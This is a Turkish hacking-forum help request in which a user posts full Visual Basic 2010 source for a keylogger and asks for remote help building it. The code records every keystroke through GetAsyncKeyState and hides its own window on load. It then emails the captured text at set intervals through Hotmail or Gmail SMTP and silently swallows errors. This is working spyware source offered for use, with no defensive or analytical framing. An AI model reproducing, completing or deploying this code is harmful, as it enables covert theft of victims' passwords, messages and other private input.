THT DUYURU

 
 
THT Yardım Merkezi THT Yardım Merkezi bölümünden; teknoloji ve bilişim ile ilgili her konu için yardım isteyebilirsiniz.

Seçenekler

Keylogger Kodum Var Visual Basic 2010'da Var Kodlamayı Yazacağım Yerde Sorun Yaşıyorm

OnlineGameHacked - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Mesajlar:
194
Konular:
43
Teşekkür (Etti):
159
Teşekkür (Aldı):
15
Ticaret:
(0) %
0
319
15-11-2012 14:32
#1
Beyler Bayanlar Keylogger Kodlaması Var Elimde Kod
Kod:
' Bu kodlar Berkay Yılmaz tarafından yazılmıştır ve facebook.com/DJYaKReBFan adresine yüklenmiştir.
' Bu dosyayı başka yerde gördüyseniz alıntı yapılmıştır!
Imports System.Net.Mail
Public Class Form1
  Public Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
  Dim keys As Integer
  Dim sayi As Integer = 0
  Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
    TusKaydet.Enabled = True
    If ComboBox1.SelectedItem = "10 sn" Then
      Timer1.Interval = "10000"
    ElseIf ComboBox1.SelectedItem = "20 sn" Then
      Timer1.Interval = "20000"
    ElseIf ComboBox1.SelectedItem = "30 sn" Then
      Timer1.Interval = "30000"
    ElseIf ComboBox1.SelectedItem = "1 dk" Then
      Timer1.Interval = "60000"
    ElseIf ComboBox1.SelectedItem = "5 dk" Then
      Timer1.Interval = "300000"
    ElseIf ComboBox1.SelectedItem = "15 dk" Then
      Timer1.Interval = "900000"
    ElseIf ComboBox1.SelectedItem = "30 dk" Then
      Timer1.Interval = "1800000"
    ElseIf ComboBox1.SelectedItem = "1 saat" Then
      Timer1.Interval = "3600000"
    End If
    Timer1.Enabled = True
  End Sub

  Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
    TusKaydet.Enabled = False
    Timer1.Enabled = False
    keylogtext.Text = ""
  End Sub

  Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
    BackgroundWorker1.RunWorkerAsync()
  End Sub

  Private Sub BackgroundWorker1_DoWork(ByVal sender As System.Object, ByVal e As System.ComponentModel.DoWorkEventArgs) Handles BackgroundWorker1.DoWork
    Try
      Dim yolla As New MailMessage
      Dim Gonderilecek, Gonderen, MailBasligi, MailKonusu, IletilecekMail As String
      Gonderilecek = TextBox3.Text
      Gonderen = TextBox1.Text
      MailBasligi = "Keylogger"
      MailKonusu = "Keylogger"
      Using web As New System.Net.WebClient
        IletilecekMail = "<font color='red' size='2' face='Tahoma'><b>Gönderilme Tarihi ve Saati:</b></font><font color='blue' size='2' face='Tahoma'><b> " + Format(Now, "dd:MM:yyyy HH:mm:ss") + "</b></font><br><br>" + "<font color='red' size='2' face='Tahoma'><b>Kaydedilen tuş kombinasyonu:</b></font><br><font color='blue' size='2' face='Tahoma'><b>" + keylogtext.Text + "</b></font>"
        Dim Gondere As New System.Net.Mail.MailAddress(Gonderen, MailKonusu)
        Dim Alici As New System.Net.Mail.MailAddress(Gonderilecek)
        Dim eposta As New System.Net.Mail.MailMessage(Gondere, Alici)
        eposta.IsBodyHtml = True
        eposta.Subject = MailBasligi
        Dim mailbilgileri As New System.Net.NetworkCredential(TextBox1.Text, TextBox2.Text)
        eposta.Body = IletilecekMail
        Dim MailClient As New System.Net.Mail.SmtpClient()
        MailClient.Host = "smtp.live.com"  'Smtp Adresi
        'Hotmail kullanıcıları için smtp adresi: smtp.live.com
        'Gmail kullanıcıları için smtp adresi: smtp.gmail.com
        'Portlar her smtp'de aynıdır.
        MailClient.Port = "587"        'Smtp Giden Portu
        MailClient.EnableSsl = True      'Burası da önemli|Güvenli Giriş Miriş Dalgası, Burası olmadan Mail hata veriyor.
        MailClient.UseDefaultCredentials = True 'Rastgele ekledim ama Bir üstteki kodla bağlantısı olabilir.
        MailClient.Credentials = mailbilgileri
        MailClient.Send(eposta)         'Maili gönderiyor...
        ' ----- Mail Gönderimi Başarılı ------
        sayi = sayi + 1
      End Using
    Catch
    End Try
  End Sub

  Private Sub sayac_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles sayac.Tick
    If TextBox4.Text = sayi Then
    Else
      TextBox4.Text = sayi
    End If
  End Sub

  Private Sub TusKaydet_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TusKaydet.Tick
    Try
      For i = 1 To 255
        keys = 0
        keys = GetAsyncKeyState(i)
        If keys = -32767 Then
          keylogtext.Text = keylogtext.Text + Chr(i)
        End If
      Next
    Catch
    End Try
  End Sub

  Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
    Kapat.enabled = True
  End Sub

  Private Sub Kapat_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Kapat.Tick
    Me.Visible = False
    Kapat.Enabled = False
  End Sub
End Class
Diye 1 Kod Simdi Ben Nasıl Bu Kodu Keylogger'ime Eklicem Ekran Görüntüsünü Hazırladım Bana Suanda Yardım Edebilicek Varmı Teamviever Bağlantısı İle ???? Teşekkürümü Eksik Tutmiyacağım Acil Yardım Arkadaşlar

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler